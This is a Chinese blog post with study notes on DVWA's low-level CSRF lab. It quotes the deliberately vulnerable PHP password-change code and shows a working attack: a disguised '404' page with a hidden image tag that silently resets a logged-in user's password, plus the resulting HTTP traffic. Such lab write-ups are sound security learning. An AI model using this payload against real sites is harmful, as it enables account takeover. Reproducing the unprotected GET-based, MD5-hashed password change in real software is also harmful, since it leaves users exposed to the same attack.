csrf-low-notes-dvwa靶场

low级别源码

分析:如果Change非空(被点击),password_new和password_conf值一致,那么新密码用md5加密后更新到数据库。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>
点击后在url地址栏可看到
http://192.168.140.147/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#

可知,如果根据这个链接构造一个其他的密码,那么当用户点击的时候,密码就会被修改。直接点击这个链接当然可以修改密码,但是,这个恶意链接太明显。

可以构造一个网页,让用户去点击,然后自动修改密码。

如下:

公网服务器上(这个在虚拟机)构造一个网页:

changepw.html

<img src="http://192.168.140.147/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display:none;"/>

<h1>404 Not found.<h1>

<h2>file not found.<h2>
该网页在服务器上的地址比如:
http://192.168.140.147/changepw.html
当用户访问该网址,返回:
GET /changepw.html HTTP/1.1

HTTP/1.1 200 OK
Content-Type: text/html

<img src="http://192.168.140.147/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display:none;"/>

<h1>404---gadsffdn<h1>

<h2>file not found.<h2>
针对标签会发送一个get请求:
GET /dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change HTTP/1.1
Host: 192.168.140.147

HTTP/1.1 200 OK
Date: Wed, 17 Mar 2021 08:34:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<body>.....
</body>
</html>

以此默默地修改密码。

完毕。

posted @ 2021-03-17 17:16  codeace  阅读(21)  评论(0)    收藏  举报